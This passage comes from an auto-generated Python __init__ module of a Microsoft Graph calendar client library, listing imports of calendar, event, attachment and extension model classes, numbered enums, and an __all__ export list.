from ._models_py3 import CollectionOfAttachment4
from ._models_py3 import CollectionOfAttachment5
from ._models_py3 import CollectionOfAttachment6
from ._models_py3 import CollectionOfAttachment7
from ._models_py3 import CollectionOfAttachment8
from ._models_py3 import CollectionOfAttachment9
from ._models_py3 import CollectionOfCalendar
from ._models_py3 import CollectionOfCalendar0
from ._models_py3 import CollectionOfCalendarGroup
from ._models_py3 import CollectionOfCalendarPermission
from ._models_py3 import CollectionOfCalendarPermission0
from ._models_py3 import CollectionOfCalendarPermission1
from ._models_py3 import CollectionOfCalendarPermission2
from ._models_py3 import CollectionOfCalendarPermission3
from ._models_py3 import CollectionOfCalendarPermission4
from ._models_py3 import CollectionOfCalendarPermission5
from ._models_py3 import CollectionOfCalendarPermission6
from ._models_py3 import CollectionOfEvent
from ._models_py3 import CollectionOfEvent0
from ._models_py3 import CollectionOfEvent1
from ._models_py3 import CollectionOfEvent10
from ._models_py3 import CollectionOfEvent11
from ._models_py3 import CollectionOfEvent12
from ._models_py3 import CollectionOfEvent13
from ._models_py3 import CollectionOfEvent14
from ._models_py3 import CollectionOfEvent15
from ._models_py3 import CollectionOfEvent16
from ._models_py3 import CollectionOfEvent17
from ._models_py3 import CollectionOfEvent18
from ._models_py3 import CollectionOfEvent19
from ._models_py3 import CollectionOfEvent2
from ._models_py3 import CollectionOfEvent20
from ._models_py3 import CollectionOfEvent21
from ._models_py3 import CollectionOfEvent22
from ._models_py3 import CollectionOfEvent23
from ._models_py3 import CollectionOfEvent24
from ._models_py3 import CollectionOfEvent25
from ._models_py3 import CollectionOfEvent26
from ._models_py3 import CollectionOfEvent27
from ._models_py3 import CollectionOfEvent28
from ._models_py3 import CollectionOfEvent29
from ._models_py3 import CollectionOfEvent3
from ._models_py3 import CollectionOfEvent30
from ._models_py3 import CollectionOfEvent31
from ._models_py3 import CollectionOfEvent32
from ._models_py3 import CollectionOfEvent33
from ._models_py3 import CollectionOfEvent34
from ._models_py3 import CollectionOfEvent35
from ._models_py3 import CollectionOfEvent36
from ._models_py3 import CollectionOfEvent37
from ._models_py3 import CollectionOfEvent38
from ._models_py3 import CollectionOfEvent39
from ._models_py3 import CollectionOfEvent4
from ._models_py3 import CollectionOfEvent40
from ._models_py3 import CollectionOfEvent41
from ._models_py3 import CollectionOfEvent42
from ._models_py3 import CollectionOfEvent5
from ._models_py3 import CollectionOfEvent6
from ._models_py3 import CollectionOfEvent7
from ._models_py3 import CollectionOfEvent8
from ._models_py3 import CollectionOfEvent9
from ._models_py3 import CollectionOfExtension
from ._models_py3 import CollectionOfExtension0
from ._models_py3 import CollectionOfExtension1
from ._models_py3 import CollectionOfExtension10
from ._models_py3 import CollectionOfExtension2
from ._models_py3 import CollectionOfExtension3
from ._models_py3 import CollectionOfExtension4
from ._models_py3 import CollectionOfExtension5
from ._models_py3 import CollectionOfExtension6
from ._models_py3 import CollectionOfExtension7
from ._models_py3 import CollectionOfExtension8
from ._models_py3 import CollectionOfExtension9
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty0
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty1
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty10
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty11
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty12
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty13
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty14
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty15
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty16
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty17
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty18
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty2
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty3
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty4
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty5
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty6
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty7
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty8
from ._models_py3 import CollectionOfMultiValueLegacyExtendedProperty9
from ._models_py3 import CollectionOfPlace
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty0
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty1
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty10
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty11
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty12
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty13
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty14
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty15
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty16
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty17
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty18
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty2
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty3
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty4
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty5
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty6
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty7
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty8
from ._models_py3 import CollectionOfSingleValueLegacyExtendedProperty9
from ._models_py3 import MicrosoftGraphAttachment
from ._models_py3 import MicrosoftGraphAttendee
from ._models_py3 import MicrosoftGraphAttendeeBase
from ._models_py3 import MicrosoftGraphCalendar
from ._models_py3 import MicrosoftGraphCalendarGroup
from ._models_py3 import MicrosoftGraphCalendarPermission
from ._models_py3 import MicrosoftGraphDateTimeZone
from ._models_py3 import MicrosoftGraphEmailAddress
from ._models_py3 import MicrosoftGraphEntity
from ._models_py3 import MicrosoftGraphEvent
from ._models_py3 import MicrosoftGraphExtension
from ._models_py3 import MicrosoftGraphItemBody
from ._models_py3 import MicrosoftGraphLocation
from ._models_py3 import MicrosoftGraphMultiValueLegacyExtendedProperty
from ._models_py3 import MicrosoftGraphOnlineMeetingInfo
from ._models_py3 import MicrosoftGraphOutlookGeoCoordinates
from ._models_py3 import MicrosoftGraphOutlookItem
from ._models_py3 import MicrosoftGraphPatternedRecurrence
from ._models_py3 import MicrosoftGraphPhone
from ._models_py3 import MicrosoftGraphPhysicalAddress
from ._models_py3 import MicrosoftGraphPlace
from ._models_py3 import MicrosoftGraphRecipient
from ._models_py3 import MicrosoftGraphRecurrencePattern
from ._models_py3 import MicrosoftGraphRecurrenceRange
from ._models_py3 import MicrosoftGraphResponseStatus
from ._models_py3 import MicrosoftGraphSingleValueLegacyExtendedProperty
from ._models_py3 import MicrosoftGraphTimeSlot
from ._models_py3 import OdataError
from ._models_py3 import OdataErrorDetail
from ._models_py3 import OdataErrorMain
except (SyntaxError, ImportError):
from ._models import CollectionOfAttachment
from ._models import CollectionOfAttachment0
from ._models import CollectionOfAttachment1
from ._models import CollectionOfAttachment10
from ._models import CollectionOfAttachment2
from ._models import CollectionOfAttachment3
from ._models import CollectionOfAttachment4
from ._models import CollectionOfAttachment5
from ._models import CollectionOfAttachment6
from ._models import CollectionOfAttachment7
from ._models import CollectionOfAttachment8
from ._models import CollectionOfAttachment9
from ._models import CollectionOfCalendar
from ._models import CollectionOfCalendar0
from ._models import CollectionOfCalendarGroup
from ._models import CollectionOfCalendarPermission
from ._models import CollectionOfCalendarPermission0
from ._models import CollectionOfCalendarPermission1
from ._models import CollectionOfCalendarPermission2
from ._models import CollectionOfCalendarPermission3
from ._models import CollectionOfCalendarPermission4
from ._models import CollectionOfCalendarPermission5
from ._models import CollectionOfCalendarPermission6
from ._models import CollectionOfEvent
from ._models import CollectionOfEvent0
from ._models import CollectionOfEvent1
from ._models import CollectionOfEvent10
from ._models import CollectionOfEvent11
from ._models import CollectionOfEvent12
from ._models import CollectionOfEvent13
from ._models import CollectionOfEvent14
from ._models import CollectionOfEvent15
from ._models import CollectionOfEvent16
from ._models import CollectionOfEvent17
from ._models import CollectionOfEvent18
from ._models import CollectionOfEvent19
from ._models import CollectionOfEvent2
from ._models import CollectionOfEvent20
from ._models import CollectionOfEvent21
from ._models import CollectionOfEvent22
from ._models import CollectionOfEvent23
from ._models import CollectionOfEvent24
from ._models import CollectionOfEvent25
from ._models import CollectionOfEvent26
from ._models import CollectionOfEvent27
from ._models import CollectionOfEvent28
from ._models import CollectionOfEvent29
from ._models import CollectionOfEvent3
from ._models import CollectionOfEvent30
from ._models import CollectionOfEvent31
from ._models import CollectionOfEvent32
from ._models import CollectionOfEvent33
from ._models import CollectionOfEvent34
from ._models import CollectionOfEvent35
from ._models import CollectionOfEvent36
from ._models import CollectionOfEvent37
from ._models import CollectionOfEvent38
from ._models import CollectionOfEvent39
from ._models import CollectionOfEvent4
from ._models import CollectionOfEvent40
from ._models import CollectionOfEvent41
from ._models import CollectionOfEvent42
from ._models import CollectionOfEvent5
from ._models import CollectionOfEvent6
from ._models import CollectionOfEvent7
from ._models import CollectionOfEvent8
from ._models import CollectionOfEvent9
from ._models import CollectionOfExtension
from ._models import CollectionOfExtension0
from ._models import CollectionOfExtension1
from ._models import CollectionOfExtension10
from ._models import CollectionOfExtension2
from ._models import CollectionOfExtension3
from ._models import CollectionOfExtension4
from ._models import CollectionOfExtension5
from ._models import CollectionOfExtension6
from ._models import CollectionOfExtension7
from ._models import CollectionOfExtension8
from ._models import CollectionOfExtension9
from ._models import CollectionOfMultiValueLegacyExtendedProperty
from ._models import CollectionOfMultiValueLegacyExtendedProperty0
from ._models import CollectionOfMultiValueLegacyExtendedProperty1
from ._models import CollectionOfMultiValueLegacyExtendedProperty10
from ._models import CollectionOfMultiValueLegacyExtendedProperty11
from ._models import CollectionOfMultiValueLegacyExtendedProperty12
from ._models import CollectionOfMultiValueLegacyExtendedProperty13
from ._models import CollectionOfMultiValueLegacyExtendedProperty14
from ._models import CollectionOfMultiValueLegacyExtendedProperty15
from ._models import CollectionOfMultiValueLegacyExtendedProperty16
from ._models import CollectionOfMultiValueLegacyExtendedProperty17
from ._models import CollectionOfMultiValueLegacyExtendedProperty18
from ._models import CollectionOfMultiValueLegacyExtendedProperty2
from ._models import CollectionOfMultiValueLegacyExtendedProperty3
from ._models import CollectionOfMultiValueLegacyExtendedProperty4
from ._models import CollectionOfMultiValueLegacyExtendedProperty5
from ._models import CollectionOfMultiValueLegacyExtendedProperty6
from ._models import CollectionOfMultiValueLegacyExtendedProperty7
from ._models import CollectionOfMultiValueLegacyExtendedProperty8
from ._models import CollectionOfMultiValueLegacyExtendedProperty9
from ._models import CollectionOfPlace
from ._models import CollectionOfSingleValueLegacyExtendedProperty
from ._models import CollectionOfSingleValueLegacyExtendedProperty0
from ._models import CollectionOfSingleValueLegacyExtendedProperty1
from ._models import CollectionOfSingleValueLegacyExtendedProperty10
from ._models import CollectionOfSingleValueLegacyExtendedProperty11
from ._models import CollectionOfSingleValueLegacyExtendedProperty12
from ._models import CollectionOfSingleValueLegacyExtendedProperty13
from ._models import CollectionOfSingleValueLegacyExtendedProperty14
from ._models import CollectionOfSingleValueLegacyExtendedProperty15
from ._models import CollectionOfSingleValueLegacyExtendedProperty16
from ._models import CollectionOfSingleValueLegacyExtendedProperty17
from ._models import CollectionOfSingleValueLegacyExtendedProperty18
from ._models import CollectionOfSingleValueLegacyExtendedProperty2
from ._models import CollectionOfSingleValueLegacyExtendedProperty3
from ._models import CollectionOfSingleValueLegacyExtendedProperty4
from ._models import CollectionOfSingleValueLegacyExtendedProperty5
from ._models import CollectionOfSingleValueLegacyExtendedProperty6
from ._models import CollectionOfSingleValueLegacyExtendedProperty7
from ._models import CollectionOfSingleValueLegacyExtendedProperty8
from ._models import CollectionOfSingleValueLegacyExtendedProperty9
from ._models import MicrosoftGraphAttachment
from ._models import MicrosoftGraphAttendee
from ._models import MicrosoftGraphAttendeeBase
from ._models import MicrosoftGraphCalendar
from ._models import MicrosoftGraphCalendarGroup
from ._models import MicrosoftGraphCalendarPermission
from ._models import MicrosoftGraphDateTimeZone
from ._models import MicrosoftGraphEmailAddress
from ._models import MicrosoftGraphEntity
from ._models import MicrosoftGraphEvent
from ._models import MicrosoftGraphExtension
from ._models import MicrosoftGraphItemBody
from ._models import MicrosoftGraphLocation
from ._models import MicrosoftGraphMultiValueLegacyExtendedProperty
from ._models import MicrosoftGraphOnlineMeetingInfo
from ._models import MicrosoftGraphOutlookGeoCoordinates
from ._models import MicrosoftGraphOutlookItem
from ._models import MicrosoftGraphPatternedRecurrence
from ._models import MicrosoftGraphPhone
from ._models import MicrosoftGraphPhysicalAddress
from ._models import MicrosoftGraphPlace
from ._models import MicrosoftGraphRecipient
from ._models import MicrosoftGraphRecurrencePattern
from ._models import MicrosoftGraphRecurrenceRange
from ._models import MicrosoftGraphResponseStatus
from ._models import MicrosoftGraphSingleValueLegacyExtendedProperty
from ._models import MicrosoftGraphTimeSlot
from ._models import OdataError
from ._models import OdataErrorDetail
from ._models import OdataErrorMain
from ._calendar_enums import (
Enum100,
Enum101,
Enum102,
Enum103,
Enum104,
Enum105,
Enum106,
Enum107,
Enum108,
Enum109,
Enum110,
Enum111,
Enum112,
Enum113,
Enum114,
Enum115,
Enum116,
Enum117,
Enum118,
Enum119,
Enum120,
Enum121,
Enum122,
Enum123,
Enum124,
Enum125,
Enum126,
Enum127,
Enum128,
Enum129,
Enum130,
Enum131,
Enum132,
Enum133,
Enum134,
Enum135,
Enum136,
Enum137,
Enum138,
Enum139,
Enum140,
Enum141,
Enum142,
Enum143,
Enum144,
Enum145,
Enum146,
Enum147,
Enum148,
Enum149,
Enum150,
Enum151,
Enum152,
Enum153,
Enum154,
Enum155,
Enum156,
Enum157,
Enum158,
Enum159,
Enum160,
Enum161,
Enum162,
Enum163,
Enum164,
Enum165,
Enum166,
Enum167,
Enum168,
Enum169,
Enum170,
Enum171,
Enum172,
Enum173,
Enum174,
Enum175,
Enum176,
Enum177,
Enum178,
Enum179,
Enum180,
Enum181,
Enum182,
Enum183,
Enum184,
Enum185,
Enum186,
Enum187,
Enum188,
Enum189,
Enum190,
Enum191,
Enum192,
Enum193,
Enum194,
Enum195,
Enum196,
Enum197,
Enum198,
Enum199,
Enum200,
Enum201,
Enum202,
Enum203,
Enum204,
Enum205,
Enum206,
Enum207,
Enum208,
Enum209,
Enum210,
Enum211,
Enum212,
Enum213,
Enum214,
Enum215,
Enum216,
Enum217,
Enum218,
Enum219,
Enum22,
Enum220,
Enum221,
Enum222,
Enum223,
Enum224,
Enum225,
Enum226,
Enum227,
Enum228,
Enum229,
Enum23,
Enum230,
Enum231,
Enum232,
Enum233,
Enum234,
Enum235,
Enum236,
Enum237,
Enum238,
Enum239,
Enum240,
Enum241,
Enum242,
Enum243,
Enum244,
Enum245,
Enum246,
Enum247,
Enum248,
Enum249,
Enum250,
Enum251,
Enum252,
Enum253,
Enum254,
Enum255,
Enum256,
Enum257,
Enum258,
Enum259,
Enum260,
Enum261,
Enum262,
Enum263,
Enum264,
Enum265,
Enum266,
Enum267,
Enum268,
Enum269,
Enum270,
Enum271,
Enum272,
Enum273,
Enum274,
Enum275,
Enum276,
Enum277,
Enum278,
Enum279,
Enum28,
Enum280,
Enum281,
Enum282,
Enum283,
Enum284,
Enum285,
Enum286,
Enum287,
Enum288,
Enum289,
Enum29,
Enum290,
Enum291,
Enum292,
Enum293,
Enum294,
Enum295,
Enum296,
Enum297,
Enum298,
Enum299,
Enum30,
Enum300,
Enum301,
Enum302,
Enum303,
Enum304,
Enum305,
Enum306,
Enum307,
Enum308,
Enum309,
Enum31,
Enum310,
Enum311,
Enum312,
Enum313,
Enum314,
Enum315,
Enum316,
Enum317,
Enum318,
Enum319,
Enum32,
Enum320,
Enum321,
Enum322,
Enum323,
Enum324,
Enum325,
Enum326,
Enum327,
Enum328,
Enum329,
Enum33,
Enum330,
Enum331,
Enum332,
Enum333,
Enum334,
Enum335,
Enum336,
Enum337,
Enum338,
Enum339,
Enum34,
Enum340,
Enum341,
Enum342,
Enum343,
Enum344,
Enum345,
Enum346,
Enum347,
Enum348,
Enum349,
Enum35,
Enum350,
Enum351,
Enum352,
Enum353,
Enum354,
Enum355,
Enum356,
Enum357,
Enum358,
Enum359,
Enum36,
Enum360,
Enum361,
Enum362,
Enum363,
Enum364,
Enum365,
Enum366,
Enum367,
Enum368,
Enum369,
Enum37,
Enum370,
Enum371,
Enum372,
Enum373,
Enum374,
Enum375,
Enum376,
Enum377,
Enum378,
Enum379,
Enum38,
Enum380,
Enum381,
Enum382,
Enum383,
Enum384,
Enum385,
Enum386,
Enum387,
Enum388,
Enum389,
Enum39,
Enum390,
Enum391,
Enum392,
Enum393,
Enum394,
Enum395,
Enum396,
Enum397,
Enum398,
Enum399,
Enum40,
Enum400,
Enum401,
Enum402,
Enum403,
Enum404,
Enum405,
Enum406,
Enum407,
Enum408,
Enum409,
Enum41,
Enum410,
Enum411,
Enum412,
Enum413,
Enum414,
Enum415,
Enum416,
Enum417,
Enum418,
Enum419,
Enum42,
Enum420,
Enum421,
Enum422,
Enum423,
Enum424,
Enum425,
Enum426,
Enum427,
Enum428,
Enum429,
Enum43,
Enum430,
Enum431,
Enum432,
Enum433,
Enum434,
Enum435,
Enum436,
Enum437,
Enum438,
Enum439,
Enum44,
Enum440,
Enum441,
Enum442,
Enum443,
Enum444,
Enum445,
Enum446,
Enum447,
Enum448,
Enum449,
Enum45,
Enum450,
Enum451,
Enum452,
Enum453,
Enum454,
Enum455,
Enum456,
Enum457,
Enum458,
Enum459,
Enum46,
Enum460,
Enum461,
Enum462,
Enum463,
Enum464,
Enum465,
Enum466,
Enum467,
Enum468,
Enum469,
Enum47,
Enum470,
Enum471,
Enum472,
Enum473,
Enum474,
Enum475,
Enum48,
Enum49,
Enum50,
Enum51,
Enum52,
Enum53,
Enum54,
Enum55,
Enum56,
Enum57,
Enum58,
Enum59,
Enum60,
Enum61,
Enum62,
Enum63,
Enum64,
Enum65,
Enum66,
Enum67,
Enum68,
Enum69,
Enum70,
Enum71,
Enum72,
Enum73,
Enum74,
Enum75,
Enum76,
Enum77,
Enum78,
Enum79,
Enum80,
Enum81,
Enum82,
Enum83,
Enum84,
Enum85,
Enum86,
Enum87,
Enum88,
Enum89,
Enum90,
Enum91,
Enum92,
Enum93,
Enum94,
Enum95,
Enum96,
Enum97,
Enum98,
Enum99,
Get10ItemsItem,
Get1ItemsItem,
Get2ItemsItem,
Get4ItemsItem,
Get5ItemsItem,
Get6ItemsItem,
Get7ItemsItem,
Get9ItemsItem,
MicrosoftGraphAttendeeType,
MicrosoftGraphBodyType,
MicrosoftGraphCalendarColor,
MicrosoftGraphCalendarRoleType,
MicrosoftGraphDayOfWeek,
MicrosoftGraphEventType,
MicrosoftGraphFreeBusyStatus,
MicrosoftGraphImportance,
MicrosoftGraphLocationType,
MicrosoftGraphLocationUniqueIdType,
MicrosoftGraphOnlineMeetingProviderType,
MicrosoftGraphPhoneType,
MicrosoftGraphPhysicalAddressType,
MicrosoftGraphRecurrencePatternType,
MicrosoftGraphRecurrenceRangeType,
MicrosoftGraphResponseType,
MicrosoftGraphSensitivity,
MicrosoftGraphWeekIndex,
)
__all__ = [
'CollectionOfAttachment',
'CollectionOfAttachment0',
'CollectionOfAttachment1',
'CollectionOfAttachment10',
'CollectionOfAttachment2',
'CollectionOfAttachment3',
'CollectionOfAttachment4',
'CollectionOfAttachment5',
'CollectionOfAttachment6',
'CollectionOfAttachment7',
'CollectionOfAttachment8',
'CollectionOfAttachment9',
'CollectionOfCalendar',
'CollectionOfCalendar0',
'CollectionOfCalendarGroup',
'CollectionOfCalendarPermission',
'CollectionOfCalendarPermission0',
'CollectionOfCalendarPermission1',
'CollectionOfCalendarPermission2',
'CollectionOfCalendarPermission3',
'CollectionOfCalendarPermission4',
'CollectionOfCalendarPermission5',
'CollectionOfCalendarPermission6',
'CollectionOfEvent',
'CollectionOfEvent0',
'CollectionOfEvent1',
'CollectionOfEvent10',
'CollectionOfEvent11',
'CollectionOfEvent12',
'CollectionOfEvent13',
'CollectionOfEvent14',
'CollectionOfEvent15',
'CollectionOfEvent16',
'CollectionOfEvent17',
'CollectionOfEvent18',
'CollectionOfEvent19',
'CollectionOfEvent2',
'CollectionOfEvent20',
'CollectionOfEvent21',
'CollectionOfEvent22',
'CollectionOfEvent23',
'CollectionOfEvent24',
'CollectionOfEvent25',
'CollectionOfEvent26',
'CollectionOfEvent27',
'CollectionOfEvent28',
'CollectionOfEvent29',
'CollectionOfEvent3',
'CollectionOfEvent30',
'CollectionOfEvent31',
'CollectionOfEvent32',
'CollectionOfEvent33',
'CollectionOfEvent34',
'CollectionOfEvent35',
'CollectionOfEvent36',
'CollectionOfEvent37',
'CollectionOfEvent38',
'CollectionOfEvent39',
'CollectionOfEvent4',
'CollectionOfEvent40',
'CollectionOfEvent41',
'CollectionOfEvent42',
'CollectionOfEvent5',
'CollectionOfEvent6',
'CollectionOfEvent7',
'CollectionOfEvent8',
'CollectionOfEvent9',
'CollectionOfExtension',
'CollectionOfExtension0',
'CollectionOfExtension1',
'CollectionOfExtension10',
'CollectionOfExtension2',
'CollectionOfExtension3',
'CollectionOfExtension4',
'CollectionOfExtension5',
'CollectionOfExtension6',
'CollectionOfExtension7',
'CollectionOfExtension8',
'CollectionOfExtension9',
'CollectionOfMultiValueLegacyExtendedProperty',
'CollectionOfMultiValueLegacyExtendedProperty0',
'CollectionOfMultiValueLegacyExtendedProperty1',
'CollectionOfMultiValueLegacyExtendedProperty10',
'CollectionOfMultiValueLegacyExtendedProperty11',
'CollectionOfMultiValueLegacyExtendedProperty12',
'CollectionOfMultiValueLegacyExtendedProperty13',
'CollectionOfMultiValueLegacyExtendedProperty14',
'CollectionOfMultiValueLegacyExtendedProperty15',
'CollectionOfMultiValueLegacyExtendedProperty16',
'CollectionOfMultiValueLegacyExtendedProperty17',
'CollectionOfMultiValueLegacyExtendedProperty18',
'CollectionOfMultiValueLegacyExtendedProperty2',
'CollectionOfMultiValueLegacyExtendedProperty3',
'CollectionOfMultiValueLegacyExtendedProperty4',
'CollectionOfMultiValueLegacyExtendedProperty5',
'CollectionOfMultiValueLegacyExtendedProperty6',
'CollectionOfMultiValueLegacyExtendedProperty7',
'CollectionOfMultiValueLegacyExtendedProperty8',
'CollectionOfMultiValueLegacyExtendedProperty9',
'CollectionOfPlace',
'CollectionOfSingleValueLegacyExtendedProperty',
'CollectionOfSingleValueLegacyExtendedProperty0',
'CollectionOfSingleValueLegacyExtendedProperty1',
'CollectionOfSingleValueLegacyExtendedProperty10',
'CollectionOfSingleValueLegacyExtendedProperty11',
'CollectionOfSingleValueLegacyExtendedProperty12',
'CollectionOfSingleValueLegacyExtendedProperty13',
'CollectionOfSingleValueLegacyExtendedProperty14',
'CollectionOfSingleValueLegacyExtendedProperty15',
'CollectionOfSingleValueLegacyExtendedProperty16',
'CollectionOfSingleValueLegacyExtendedProperty17',
'CollectionOfSingleValueLegacyExtendedProperty18',
'CollectionOfSingleValueLegacyExtendedProperty2',
'CollectionOfSingleValueLegacyExtendedProperty3',
'CollectionOfSingleValueLegacyExtendedProperty4',
'CollectionOfSingleValueLegacyExtendedProperty5',
'CollectionOfSingleValueLegacyExtendedProperty6',
'CollectionOfSingleValueLegacyExtendedProperty7',
'CollectionOfSingleValueLegacyExtendedProperty8',
'CollectionOfSingleValueLegacyExtendedProperty9',
'MicrosoftGraphAttachment',
'MicrosoftGraphAttendee',
'MicrosoftGraphAttendeeBase',
'MicrosoftGraphCalendar',
'MicrosoftGraphCalendarGroup',
'MicrosoftGraphCalendarPermission',
'MicrosoftGraphDateTimeZone',
'MicrosoftGraphEmailAddress',
'MicrosoftGraphEntity',
'MicrosoftGraphEvent',
'MicrosoftGraphExtension',
'MicrosoftGraphItemBody',
'MicrosoftGraphLocation',
'MicrosoftGraphMultiValueLegacyExtendedProperty',
'MicrosoftGraphOnlineMeetingInfo',
'MicrosoftGraphOutlookGeoCoordinates',
'MicrosoftGraphOutlookItem',
'MicrosoftGraphPatternedRecurrence',
'MicrosoftGraphPhone',
'MicrosoftGraphPhysicalAddress',
'MicrosoftGraphPlace',
'MicrosoftGraphRecipient',
'MicrosoftGraphRecurrencePattern',
'MicrosoftGraphRecurrenceRange',
'MicrosoftGraphResponseStatus',
'MicrosoftGraphSingleValueLegacyExtendedProperty',
'MicrosoftGraphTimeSlot',
'OdataError',
'OdataErrorDetail',
'OdataErrorMain',
'Enum100',
'Enum101',
'Enum102',
'Enum103',
'Enum104',
'Enum105',
'Enum106',
'Enum107',
'Enum108',
'Enum109',
'Enum110',
'Enum111',
'Enum112',
'Enum113',
'Enum114',
'Enum115',
'Enum116',
'Enum117',
'Enum118',
'Enum119',
'Enum120',
'Enum121',
'Enum122',
'Enum123',
'Enum124',
'Enum125',
'Enum126',
'Enum127',
'Enum128',
'Enum129',
'Enum130',
'Enum131',
'Enum132',
'Enum133',
'Enum134',
'Enum135',
'Enum136',
'Enum137',
'Enum138',
'Enum139',
'Enum140',
'Enum141',
'Enum142',
'Enum143',
'Enum144',
'Enum145',
'Enum146',
'Enum147',
'Enum148',
'Enum149',
'Enum150',
'Enum151',
'Enum152',
'Enum153',
'Enum154',
'Enum155',
'Enum156',
'Enum157',
'Enum158',
'Enum159',
'Enum160',
'Enum161',
'Enum162',
'Enum163',
'Enum164',
'Enum165',
'Enum166',
'Enum167',
'Enum168',
'Enum169',
'Enum170',
'Enum171',
'Enum172',
'Enum173',
'Enum174',
'Enum175',
'Enum176',
'Enum177',
'Enum178',
'Enum179',
'Enum180',
'Enum181',
'Enum182',
'Enum183',
'Enum184',
'Enum185',
'Enum186',
'Enum187',
'Enum188',
'Enum189',
'Enum190',
'Enum191',
'Enum192',
'Enum193',
'Enum194',
'Enum195',
'Enum196',
'Enum197',
'Enum198',
'Enum199',
'Enum200',
'Enum201',
'Enum202',
'Enum203',
'Enum204',
'Enum205',
'Enum206',
'Enum207',
'Enum208',
'Enum209',
'Enum210',
'Enum211',
'Enum212',
'Enum213',
'Enum214',
'Enum215',
'Enum216',
'Enum217',
'Enum218',
'Enum219',
'Enum22',
'Enum220',
'Enum221',
'Enum222',
'Enum223',
'Enum224',
'Enum225',
'Enum226',
'Enum227',
'Enum228',
'Enum229',
'Enum23',
'Enum230',
'Enum231',
'Enum232',
'Enum233',
'Enum234',
'Enum235',
'Enum236',
'Enum237',
'Enum238',
'Enum239',
'Enum240',
'Enum241',
'Enum242',
'Enum243',
'Enum244',
'Enum245',
'Enum246',
'Enum247',
'Enum248',
'Enum249',
'Enum250',
'Enum251',
'Enum252',
'Enum253',
'Enum254',
'Enum255',
'Enum256',
'Enum257',
'Enum258',
'Enum259',
'Enum260',
'Enum261',
'Enum262',
'Enum263',
'Enum264',
'Enum265',
'Enum266',
'Enum267',
'Enum268',
'Enum269',
'Enum270',
'Enum271',
'Enum272',
'Enum273',
'Enum274',
'Enum275',
'Enum276',
'Enum277',
'Enum278',
'Enum279',
'Enum28',
'Enum280',
'Enum281',
'Enum282',
'Enum283',
'Enum284',
'Enum285',
'Enum286',
'Enum287',
'Enum288',
'Enum289',
'Enum29',
'Enum290',
'Enum291',
'Enum292',
'Enum293',
'Enum294',
'Enum295',
'Enum296',
'Enum297',
'Enum298',
'Enum299',
'Enum30',
'Enum300',
'Enum301',
'Enum302',
'Enum303',
'Enum304',
'Enum305',
'Enum306',
'Enum307',
'Enum308',
'Enum309',
'Enum31',
'Enum310',
'Enum311',
'Enum312',
'Enum313',
'Enum314',
'Enum315',
'Enum316',
'Enum317',
'Enum318',
'Enum319',
'Enum32',
'Enum320',
'Enum321',
'Enum322',
'Enum323',
'Enum324',
'Enum325',
'Enum326',
'Enum327',
'Enum328',
'Enum329',
'Enum33',
'Enum330',
'Enum331',
'Enum332',
'Enum333',
'Enum334',
'Enum335',
'Enum336',
'Enum337',
'Enum338',
'Enum339',
'Enum34',
'Enum340',
'Enum341',
'Enum342',
'Enum343',
'Enum344',
'Enum345',
'Enum346',
'Enum347',
'Enum348',
'Enum349',
'Enum35',
'Enum350',
'Enum351',
'Enum352',
'Enum353',
'Enum354',
'Enum355',
'Enum356',
'Enum357',
'Enum358',
'Enum359',
'Enum36',
'Enum360',
'Enum361',
'Enum362',
'Enum363',
'Enum364',
'Enum365',
'Enum366',
'Enum367',
'Enum368',
'Enum369',
'Enum37',
'Enum370',
'Enum371',
'Enum372',
'Enum373',
'Enum374',
'Enum375',
'Enum376',
'Enum377',
'Enum378',
'Enum379',
'Enum38',
'Enum380',
'Enum381',
'Enum382',
'Enum383',
'Enum384',
'Enum385',
'Enum386',
'Enum387',
'Enum388',
'Enum389',
'Enum39',
'Enum390',
'Enum391',
'Enum392',
'Enum393',
'Enum394',
'Enum395',
'Enum396',
'Enum397',
'Enum398',
'Enum399',
'Enum40',
'Enum400',
'Enum401',
'Enum402',
'Enum403',
'Enum404',
'Enum405',
'Enum406',
'Enum407',
'Enum408',
'Enum409',
'Enum41',
'Enum410',
'Enum411',
'Enum412',
'Enum413',
'Enum414',
'Enum415',
'Enum416',
'Enum417',
'Enum418',
'Enum419',
'Enum42',
'Enum420',
'Enum421',
'Enum422',
'Enum423',
'Enum424',
'Enum425',
'Enum426',
'Enum427',
'Enum428',
'Enum429',
'Enum43',
'Enum430',
'Enum431',
'Enum432',
'Enum433',
'Enum434',
'Enum435',
'Enum436',
'Enum437',
'Enum438',
'Enum439',
'Enum44',
'Enum440',
